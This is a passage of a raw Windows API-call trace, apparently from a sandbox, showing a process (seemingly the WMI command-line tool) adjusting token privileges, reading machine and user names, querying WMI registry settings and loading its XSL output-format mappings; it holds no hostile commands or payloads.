dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0108.598] CoCreateInstance (in: rclsid=0xffc373a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc37370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffca2940 | out: ppv=0xffca2940*=0x1d51390) returned 0x0 [0108.608] GetCurrentProcess () returned 0xffffffffffffffff [0108.608] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x10f900 | out: TokenHandle=0x10f900*=0xf4) returned 1 [0108.608] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10f8f8 | out: TokenInformation=0x0, ReturnLength=0x10f8f8) returned 0 [0108.608] malloc (_Size=0x118) returned 0x4669a0 [0108.608] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4669a0, TokenInformationLength=0x118, ReturnLength=0x10f8f8 | out: TokenInformation=0x4669a0, ReturnLength=0x10f8f8) returned 1 [0108.608] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4669a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=38994662, Attributes=0xa2b5), (Luid.LowPart=0x0, Luid.HighPart=4620000, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0108.608] free (_Block=0x4669a0) [0108.608] CloseHandle (hObject=0xf4) returned 1 [0108.608] malloc (_Size=0x40) returned 0x467ee0 [0108.608] malloc (_Size=0x40) returned 0x467f30 [0108.608] malloc (_Size=0x40) returned 0x467f80 [0108.608] malloc (_Size=0x20a) returned 0x4669a0 [0108.608] GetSystemDirectoryW (in: lpBuffer=0x4669a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.608] free (_Block=0x4669a0) [0108.608] malloc (_Size=0x18) returned 0x32dfb0 [0108.609] malloc (_Size=0x18) returned 0x4669a0 [0108.609] malloc (_Size=0x18) returned 0x4669c0 [0108.609] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0108.609] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0108.609] free (_Block=0x32dfb0) [0108.609] free (_Block=0x4669a0) [0108.609] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0108.609] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0108.609] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0108.610] FreeLibrary (hLibModule=0x77940000) returned 1 [0108.610] free (_Block=0x4669c0) [0108.610] _vsnwprintf (in: _Buffer=0x467f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x10f528 | out: _Buffer="ms_409") returned 6 [0108.610] malloc (_Size=0x20) returned 0x4669a0 [0108.610] GetComputerNameW (in: lpBuffer=0x4669a0, nSize=0x10f900 | out: lpBuffer="XDUWTFONO", nSize=0x10f900) returned 1 [0108.610] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.610] malloc (_Size=0x14) returned 0x32dfb0 [0108.610] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.610] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x10f8f8 | out: lpNameBuffer=0x0, nSize=0x10f8f8) returned 0x7fffffde000 [0108.612] GetLastError () returned 0xea [0108.612] malloc (_Size=0x40) returned 0x4669d0 [0108.612] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4669d0, nSize=0x10f8f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10f8f8) returned 0x1 [0108.612] lstrlenW (lpString="") returned 0 [0108.612] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0108.613] lstrlenW (lpString=".") returned 1 [0108.613] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.613] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0108.613] lstrlenW (lpString="LOCALHOST") returned 9 [0108.613] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.613] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0108.613] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.614] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.614] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0108.614] free (_Block=0x32dfb0) [0108.614] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.614] malloc (_Size=0x14) returned 0x32dfb0 [0108.614] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.614] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.614] malloc (_Size=0x14) returned 0x466a20 [0108.614] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.614] malloc (_Size=0x8) returned 0x466a40 [0108.614] malloc (_Size=0x18) returned 0x466a60 [0108.614] malloc (_Size=0x30) returned 0x466a80 [0108.614] malloc (_Size=0x18) returned 0x466ac0 [0108.614] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.614] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.614] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.614] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.614] malloc (_Size=0x30) returned 0x466ae0 [0108.614] malloc (_Size=0x18) returned 0x466b20 [0108.614] SysStringLen (param_1="IMPERSONATE") returned 0xb [0108.614] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.615] SysStringLen (param_1="IMPERSONATE") returned 0xb [0108.615] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.615] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.615] SysStringLen (param_1="IMPERSONATE") returned 0xb [0108.615] malloc (_Size=0x30) returned 0x466b40 [0108.615] malloc (_Size=0x18) returned 0x466b80 [0108.615] SysStringLen (param_1="DELEGATE") returned 0x8 [0108.615] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.615] SysStringLen (param_1="DELEGATE") returned 0x8 [0108.615] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.615] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.615] SysStringLen (param_1="DELEGATE") returned 0x8 [0108.615] malloc (_Size=0x30) returned 0x466ba0 [0108.615] malloc (_Size=0x18) returned 0x466be0 [0108.615] malloc (_Size=0x30) returned 0x466c00 [0108.615] malloc (_Size=0x18) returned 0x466c40 [0108.615] SysStringLen (param_1="NONE") returned 0x4 [0108.615] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.615] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.615] SysStringLen (param_1="NONE") returned 0x4 [0108.615] malloc (_Size=0x30) returned 0x466c60 [0108.615] malloc (_Size=0x18) returned 0x466ca0 [0108.615] SysStringLen (param_1="CONNECT") returned 0x7 [0108.615] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.615] malloc (_Size=0x30) returned 0x466cc0 [0108.615] malloc (_Size=0x18) returned 0x466d00 [0108.615] SysStringLen (param_1="CALL") returned 0x4 [0108.616] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.616] SysStringLen (param_1="CALL") returned 0x4 [0108.616] SysStringLen (param_1="CONNECT") returned 0x7 [0108.616] malloc (_Size=0x30) returned 0x466d20 [0108.616] malloc (_Size=0x18) returned 0x466d60 [0108.616] SysStringLen (param_1="PKT") returned 0x3 [0108.616] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.616] SysStringLen (param_1="PKT") returned 0x3 [0108.616] SysStringLen (param_1="NONE") returned 0x4 [0108.616] SysStringLen (param_1="NONE") returned 0x4 [0108.616] SysStringLen (param_1="PKT") returned 0x3 [0108.616] malloc (_Size=0x30) returned 0x466d80 [0108.616] malloc (_Size=0x18) returned 0x466dc0 [0108.616] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.616] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.616] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.616] SysStringLen (param_1="NONE") returned 0x4 [0108.616] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.616] SysStringLen (param_1="PKT") returned 0x3 [0108.616] SysStringLen (param_1="PKT") returned 0x3 [0108.616] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.616] malloc (_Size=0x30) returned 0x468000 [0108.617] malloc (_Size=0x18) returned 0x466de0 [0108.617] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0108.617] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.617] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0108.617] SysStringLen (param_1="PKT") returned 0x3 [0108.617] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0108.617] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.617] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.617] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0108.617] malloc (_Size=0x30) returned 0x468040 [0108.617] malloc (_Size=0x40) returned 0x466e00 [0108.617] malloc (_Size=0x20a) returned 0x466e50 [0108.617] GetSystemDirectoryW (in: lpBuffer=0x466e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.617] free (_Block=0x466e50) [0108.617] malloc (_Size=0x18) returned 0x466e50 [0108.617] malloc (_Size=0x18) returned 0x466e70 [0108.618] malloc (_Size=0x18) returned 0x466e90 [0108.618] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0108.618] SysStringLen (param_1="\\wbem\\") returned 0x6 [0108.618] free (_Block=0x466e50) [0108.618] free (_Block=0x466e70) [0108.618] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0108.618] free (_Block=0x466e90) [0108.618] malloc (_Size=0x18) returned 0x466e50 [0108.618] malloc (_Size=0x18) returned 0x466e70 [0108.618] malloc (_Size=0x18) returned 0x466e90 [0108.618] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0108.618] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0108.618] free (_Block=0x466e50) [0108.618] free (_Block=0x466e70) [0108.618] GetCurrentThreadId () returned 0x8ac [0108.619] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x10f200 | out: phkResult=0x10f200*=0xf8) returned 0x0 [0108.619] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x10f250, lpcbData=0x10f1f0*=0x400 | out: lpType=0x0, lpData=0x10f250*=0x30, lpcbData=0x10f1f0*=0x4) returned 0x0 [0108.619] _wcsicmp (_String1="0", _String2="1") returned -1 [0108.619] _wcsicmp (_String1="0", _String2="2") returned -2 [0108.619] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x10f1f0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x10f1f0*=0x42) returned 0x0 [0108.619] malloc (_Size=0x86) returned 0x466eb0 [0108.619] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x466eb0, lpcbData=0x10f1f0*=0x42 | out: lpType=0x0, lpData=0x466eb0*=0x25, lpcbData=0x10f1f0*=0x42) returned 0x0 [0108.619] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0108.619] malloc (_Size=0x42) returned 0x466f40 [0108.619] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0108.619] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x10f250, lpcbData=0x10f1f0*=0x400 | out: lpType=0x0, lpData=0x10f250*=0x36, lpcbData=0x10f1f0*=0xc) returned 0x0 [0108.619] _wtol (_String="65536") returned 65536 [0108.619] free (_Block=0x466eb0) [0108.619] RegCloseKey (hKey=0x0) returned 0x6 [0108.619] CoCreateInstance (in: rclsid=0xffc37410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc373f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x10f6f8 | out: ppv=0x10f6f8*=0x21371d0) returned 0x0 [0108.639] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x21371d0, xmlSource=0x10f840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x466e50), isSuccessful=0x10f8b0 | out: isSuccessful=0x10f8b0*=0xffff) returned 0x0 [0108.758] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21371d0, DOMElement=0x10f6f0 | out: DOMElement=0x10f6f0) returned 0x0 [0108.758] malloc (_Size=0x18) returned 0x466e50 [0108.759] free (_Block=0x466e50) [0108.759] malloc (_Size=0x18) returned 0x466e50 [0108.759] free (_Block=0x466e50) [0108.759] malloc (_Size=0x18) returned 0x466e50 [0108.759] malloc (_Size=0x18) returned 0x466e70 [0108.759] malloc (_Size=0x30) returned 0x468080 [0108.760] malloc (_Size=0x18) returned 0x466eb0 [0108.760] free (_Block=0x466eb0) [0108.760] malloc (_Size=0x18) returned 0x46c560 [0108.760] malloc (_Size=0x18) returned 0x46c580 [0108.760] SysStringLen (param_1="VALUE") returned 0x5 [0108.760] SysStringLen (param_1="TABLE") returned 0x5 [0108.760] SysStringLen (param_1="TABLE") returned 0x5 [0108.760] SysStringLen (param_1="VALUE") returned 0x5 [0108.760] malloc (_Size=0x30) returned 0x4680c0 [0108.760] malloc (_Size=0x18) returned 0x46c5a0 [0108.760] free (_Block=0x46c5a0) [0108.760] malloc (_Size=0x18) returned 0x46c5a0 [0108.761] malloc (_Size=0x18) returned 0x46c5c0 [0108.761] SysStringLen (param_1="LIST") returned 0x4 [0108.761] SysStringLen (param_1="TABLE") returned 0x5 [0108.761] malloc (_Size=0x30) returned 0x468100 [0108.761] malloc (_Size=0x18) returned 0x46c5e0 [0108.761] free (_Block=0x46c5e0) [0108.761] malloc (_Size=0x18) returned 0x46c5e0 [0108.761] malloc (_Size=0x18) returned 0x46c600 [0108.761] SysStringLen (param_1="RAWXML") returned 0x6 [0108.761] SysStringLen (param_1="TABLE") returned 0x5 [0108.761] SysStringLen (param_1="RAWXML") returned 0x6 [0108.761] SysStringLen (param_1="LIST") returned 0x4 [0108.761] SysStringLen (param_1="LIST") returned 0x4 [0108.761] SysStringLen (param_1="RAWXML") returned 0x6 [0108.761] malloc (_Size=0x30) returned 0x468140 [0108.762] malloc (_Size=0x18) returned 0x46c620 [0108.762] free (_Block=0x46c620) [0108.762] malloc (_Size=0x18) returned 0x46c620 [0108.762] malloc (_Size=0x18) returned 0x46c640 [0108.762] SysStringLen (param_1="HTABLE") returned 0x6 [0108.762] SysStringLen (param_1="TABLE") returned 0x5 [0108.762] SysStringLen (param_1="HTABLE") returned 0x6 [0108.762] SysStringLen (param_1="LIST") returned 0x4 [0108.762] malloc (_Size=0x30) returned 0x468180 [0108.762] malloc (_Size=0x18) returned 0x46c660 [0108.763] free (_Block=0x46c660) [0108.763] malloc (_Size=0x18) returned 0x46c660 [0108.763] malloc (_Size=0x18) returned 0x46c680 [0108.763] SysStringLen (param_1="HFORM") returned 0x5 [0108.763] SysStringLen (param_1="TABLE") returned 0x5 [0108.763] SysStringLen (param_1="HFORM") returned 0x5 [0108.763] SysStringLen (param_1="LIST") returned 0x4 [0108.763] SysStringLen (param_1="HFORM") returned 0x5 [0108.763] SysStringLen (param_1="HTABLE") returned 0x6 [0108.763] malloc (_Size=0x30) returned 0x4681c0 [0108.763] malloc (_Size=0x18) returned 0x46c6a0 [0108.763] free (_Block=0x46c6a0) [0108.763] malloc (_Size=0x18) returned 0x46c6a0 [0108.763] malloc (_Size=0x18) returned 0x46c6c0 [0108.764] SysStringLen (param_1="XML") returned 0x3 [0108.764] SysStringLen (param_1="TABLE") returned 0x5 [0108.764] SysStringLen (param_1="XML") returned 0x3 [0108.764] SysStringLen (param_1="VALUE") returned 0x5 [0108.764] SysStringLen (param_1="VALUE") returned 0x5 [0108.764] SysStringLen (param_1="XML") returned 0x3 [0108.764] malloc (_Size=0x30) returned 0x468200 [0108.764] malloc (_Size=0x18) returned 0x46c6e0 [0108.764] free (_Block=0x46c6e0) [0108.764] malloc (_Size=0x18) returned 0x46c6e0 [0108.764] malloc (_Size=0x18) returned 0x46c700 [0108.764] SysStringLen (param_1="MOF") returned 0x3 [0108.764] SysStringLen (param_1="TABLE") returned 0x5 [0108.764] SysStringLen (param_1="MOF") returned 0x3 [0108.764] SysStringLen (param_1="LIST") returned 0x4 [0108.765] SysStringLen (param_1="MOF") returned 0x3 [0108.765] SysStringLen (param_1="RAWXML") returned 0x6 [0108.765] SysStringLen (param_1="LIST") returned 0x4 [0108.765] SysStringLen (param_1="MOF") returned 0x3 [0108.765] malloc (_Size=0x30) returned 0x468240 [0108.765] malloc (_Size=0x18) returned 0x46c720 [0108.765] free (_Block=0x46c720) [0108.765] malloc (_Size=0x18) returned 0x46c720 [0108.765] malloc (_Size=0x18) returned 0x46c740 [0108.765] SysStringLen (param_1="CSV") returned 0x3 [0108.765] SysStringLen (param_1="TABLE") returned 0x5 [0108.765] SysStringLen (param_1="CSV") returned 0x3 [0108.765] SysStringLen (param_1="LIST") returned 0x4 [0108.765] SysStringLen (param_1="CSV") returned 0x3 [0108.765] SysStringLen (param_1="HTABLE") returned 0x6 [0108.765] SysStringLen (param_1="CSV") returned 0x3 [0108.765] SysStringLen (param_1="HFORM") returned 0x5 [0108.766] malloc (_Size=0x30) returned 0x468280 [0108.766] malloc (_Size=0x18) returned 0x46c760 [0108.766] free (_Block=0x46c760) [0108.766] malloc (_Size=0x18) returned 0x46c760 [0108.766] malloc (_Size=0x18) returned 0x46c780 [0108.766] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.766] SysStringLen (param_1="TABLE") returned 0x5 [0108.766] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.766] SysStringLen (param_1="VALUE") returned 0x5 [0108.766] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.766] SysStringLen (param_1="XML") returned 0x3 [0108.766] SysStringLen (param_1="XML") returned 0x3 [0108.766] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.766] malloc (_Size=0x30) returned 0x4682c0 [0108.767] malloc (_Size=0x18) returned 0x46c7a0 [0108.767] free (_Block=0x46c7a0) [0108.767] malloc (_Size=0x18) returned 0x46c7a0 [0108.767] malloc (_Size=0x18) returned 0x46c7c0 [0108.767] SysStringLen (param_1="texttablewsys") returned 0xd [0108.767] SysStringLen (param_1="TABLE") returned 0x5 [0108.767] SysStringLen (param_1="texttablewsys") returned 0xd [0108.767] SysStringLen (param_1="XML") returned 0x3 [0108.767] SysStringLen (param_1="texttablewsys") returned 0xd [0108.767] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.767] SysStringLen (param_1="XML") returned 0x3 [0108.767] SysStringLen (param_1="texttablewsys") returned 0xd [0108.767] malloc (_Size=0x30) returned 0x468300 [0108.768] malloc (_Size=0x18) returned 0x46c7e0 [0108.768] free (_Block=0x46c7e0) [0108.768] malloc (_Size=0x18) returned 0x46c7e0 [0108.768] malloc (_Size=0x18) returned 0x46c800 [0108.768] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.768] SysStringLen (param_1="TABLE") returned 0x5 [0108.768] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.768] SysStringLen (param_1="XML") returned 0x3 [0108.768] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.768] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.768] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.768] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.768] malloc (_Size=0x30) returned 0x468340 [0108.768] malloc (_Size=0x18) returned 0x46c820 [0108.769] free (_Block=0x46c820) [0108.769] malloc (_Size=0x18) returned 0x46c820 [0108.769] malloc (_Size=0x18) returned 0x46c840 [0108.769] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.769] SysStringLen (param_1="TABLE") returned 0x5 [0108.769] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.769] SysStringLen (param_1="XML") returned 0x3 [0108.769] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.769] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.769] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.769] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.769] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.769] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.769] malloc (_Size=0x30) returned 0x468380 [0108.770] malloc (_Size=0x18) returned 0x46c860 [0108.770] free (_Block=0x46c860) [0108.770] malloc (_Size=0x18) returned 0x46c860 [0108.770] malloc (_Size=0x18) returned 0x46c880 [0108.770] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.770] SysStringLen (param_1="TABLE") returned 0x5 [0108.770] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.770] SysStringLen (param_1="XML") returned 0x3 [0108.770] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.770] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.770] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.770] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.770] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.770] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.770] malloc (_Size=0x30) returned 0x4683c0 [0108.771] malloc (_Size=0x18) returned 0x46c8a0 [0108.771] free (_Block=0x46c8a0) [0108.771] malloc (_Size=0x18) returned 0x46c8a0 [0108.771] malloc (_Size=0x18) returned 0x46c8c0 [0108.771] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.771] SysStringLen (param_1="TABLE") returned 0x5 [0108.771] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.771] SysStringLen (param_1="XML") returned 0x3 [0108.771] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.771] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.771] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.771] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.771] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.771] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.771] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.771] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.771] malloc (_Size=0x30) returned 0x468400 [0108.772] malloc (_Size=0x18) returned 0x46c8e0 [0108.772] free (_Block=0x46c8e0) [0108.772] malloc (_Size=0x18) returned 0x46c8e0 [0108.772] malloc (_Size=0x18) returned 0x46c900 [0108.772] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.772] SysStringLen (param_1="TABLE") returned 0x5 [0108.772] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.772] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.772] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.772] SysStringLen (param_1="XML") returned 0x3 [0108.772] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.772] SysStringLen (param_1="texttablewsys") returned 0xd [0108.772] SysStringLen (param_1="XML") returned 0x3 [0108.772] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.772] malloc (_Size=0x30) returned 0x468440 [0108.773] malloc (_Size=0x18) returned 0x46c920 [0108.773] free (_Block=0x46c920) [0108.773] malloc (_Size=0x18) returned 0x46c920 [0108.773] malloc (_Size=0x18) returned 0x46c940 [0108.773] SysStringLen (param_1="htable-sortby") returned 0xd [0108.773] SysStringLen (param_1="TABLE") returned 0x5 [0108.773] SysStringLen (param_1="htable-sortby") returned 0xd [0108.773] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.773] SysStringLen (param_1="htable-sortby") returned 0xd [0108.773] SysStringLen (param_1="XML") returned 0x3 [0108.773] SysStringLen (param_1="htable-sortby") returned 0xd [0108.773] SysStringLen (param_1="texttablewsys") returned 0xd [0108.773] SysStringLen (param_1="htable-sortby") returned 0xd [0108.773] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.773] SysStringLen (param_1="XML") returned 0x3 [0108.773] SysStringLen (param_1="htable-sortby") returned 0xd [0108.773] malloc (_Size=0x30) returned 0x468480 [0108.774] malloc (_Size=0x18) returned 0x46c960 [0108.774] free (_Block=0x46c960) [0108.774] malloc (_Size=0x18) returned 0x46c960 [0108.774] malloc (_Size=0x18) returned 0x46c980 [0108.774] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.774] SysStringLen (param_1="TABLE") returned 0x5 [0108.774] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.774] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.774] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.774] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.774] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.774] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.774] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.774] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.774] malloc (_Size=0x30) returned 0x4684c0 [0108.774] malloc (_Size=0x18) returned 0x46c9a0 [0108.775] free (_Block=0x46c9a0) [0108.775] malloc (_Size=0x18) returned 0x46c9a0 [0108.775] malloc (_Size=0x18) returned 0x46c9c0 [0108.775] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.775] SysStringLen (param_1="TABLE") returned 0x5 [0108.775] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.775] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.775] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.775] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.775] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.775] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.775] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.775] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.775] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.775] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.775] malloc (_Size=0x30) returned 0x468500 [0108.776] malloc (_Size=0x18) returned 